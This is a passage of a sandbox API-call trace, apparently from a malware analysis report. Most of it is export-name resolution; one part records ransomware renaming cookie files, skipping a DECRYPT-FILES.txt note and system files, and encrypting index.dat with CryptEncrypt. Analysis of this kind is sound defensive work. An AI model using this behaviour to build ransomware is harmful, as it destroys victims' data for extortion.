returned="DeactivateActCtx" [0079.721] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0079.721] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0079.721] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0079.721] lstrlenA (lpString="DEBUGBREAK") returned 10 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0079.721] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0079.721] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0079.721] lstrlenA (lpString="DECODEPOINTER") returned 13 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0079.721] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0079.721] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0079.721] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0079.721] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0079.721] lstrlenA (lpString="DELETEATOM") returned 10 [0079.721] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0079.722] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0079.722] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0079.722] lstrlenA (lpString="DELETEFIBER") returned 11 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0079.722] lstrlenA (lpString="DELETEFILEA") returned 11 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0079.722] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0079.722] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0079.722] lstrlenA (lpString="DELETEFILEW") returned 11 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0079.722] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0079.722] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0079.722] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0079.722] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0079.722] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0079.722] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0079.722] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0079.722] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0079.722] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0079.722] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0079.722] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0079.722] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0079.722] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0079.723] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0079.723] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0079.723] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0079.723] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0079.723] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0079.723] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0079.723] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0079.723] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0079.723] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0079.723] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0079.723] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0079.723] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0079.723] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0079.723] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0079.723] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0079.723] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0079.723] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0079.723] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0079.723] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0079.724] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0079.724] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0079.724] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0079.724] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0079.724] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0079.724] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0079.724] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0079.724] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt") returned 111 [0079.724] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4") returned 119 [0079.724] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btFrYj4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\5p5nrgjn0js_halpmcxz@www.msn[2].txt.btfryj4"), dwFlags=0x0) returned 1 [0079.725] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.725] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.725] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.725] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab4b5ec0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xab4b5ec0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xab4b5ec0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0079.726] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0079.726] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2026, ftCreationTime.dwLowDateTime=0x4f090c50, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x4f090c50, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x432daef0, ftLastWriteTime.dwHighDateTime=0x1d2faf3, nFileSizeHigh=0x0, nFileSizeLow=0x8000, dwReserved0=0x0, dwReserved1=0x0, cFileName="index.dat", cAlternateFileName="")) returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="DECRYPT-FILES.txt") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="autorun.inf") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="boot.ini") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="desktop.ini") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat") returned -1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="iconcache.db") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="bootsect.bak") returned 1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="ntuser.dat.log") returned -1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="thumbs.db") returned -1 [0079.726] lstrcmpiW (lpString1="index.dat", lpString2="Bootfont.bin") returned 1 [0079.726] lstrlenW (lpString="index.dat") returned 9 [0079.726] lstrcmpiW (lpString1="dat", lpString2="lnk") returned -1 [0079.726] lstrcmpiW (lpString1="dat", lpString2="exe") returned -1 [0079.726] lstrcmpiW (lpString1="dat", lpString2="sys") returned -1 [0079.726] lstrcmpiW (lpString1="dat", lpString2="dll") returned -1 [0079.726] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned 76 [0079.726] lstrlenW (lpString="index.dat") returned 9 [0079.726] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\" [0079.726] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\", lpString2="index.dat" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" [0079.726] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.726] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\Low\\index.dat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\windows\\cookies\\low\\index.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x460 [0079.727] GetFileSizeEx (in: hFile=0x460, lpFileSize=0x3f2d480 | out: lpFileSize=0x3f2d480*=32768) returned 1 [0079.727] CreateFileMappingW (hFile=0x460, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x464 [0079.727] MapViewOfFile (hFileMappingObject=0x464, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfc0000 [0079.728] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0079.728] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0079.728] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.729] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x28, dwBufLen=0x100 | out: pbData=0x10d0000*, pdwDataLen=0x3f2d3e8*=0x100) returned 1 [0079.729] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10e0000 [0079.730] VirtualFree (lpAddress=0x10e0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.730] UnmapViewOfFile (lpBaseAddress=0xfc0000) returned 1 [0079.731] CloseHandle (hObject=0x464) returned 1 [0079.731] SetFilePointerEx (in: hFile=0x460, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.731] WriteFile (in: hFile=0x460, lpBuffer=0x10d0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2d408, lpOverlapped=0x0 | out: lpBuffer=0x10d0000*, lpNumberOfBytesWritten=0x3f2d408*=0x108, lpOverlapped=0x0) returned 1 [0079.732] CloseHandle (hObject=0x0) returned 0 [0079.732] CloseHandle (hObject=0x460) returned 1 [0079.733] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.733] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.733] GetTickCount () returned 0x114c6c9 [0079.733] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0079.734] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0079.734] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0079.734] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0079.734] lstrlenA (lpString="kernel32.dll") returned 12 [0079.734] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0079.734] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0079.734] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0079.734] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0079.734] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0079.734] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0079.734] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0079.735] lstrlenA (lpString="ADDATOMA") returned 8 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0079.735] lstrlenA (lpString="ADDATOMW") returned 8 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0079.735] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0079.735] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0079.735] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0079.735] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0079.735] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0079.735] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0079.735] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0079.735] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0079.735] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0079.735] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0079.735] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0079.735] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0079.735] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0079.735] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0079.735] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0079.735] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0079.735] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0079.736] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0079.736] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0079.736] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0079.736] lstrlenA (lpString="BACKUPREAD") returned 10 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0079.736] lstrlenA (lpString="BACKUPSEEK") returned 10 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0079.736] lstrlenA (lpString="BACKUPWRITE") returned 11 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0079.736] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0079.736] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0079.736] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0079.736] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0079.736] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0079.736] lstrlenA 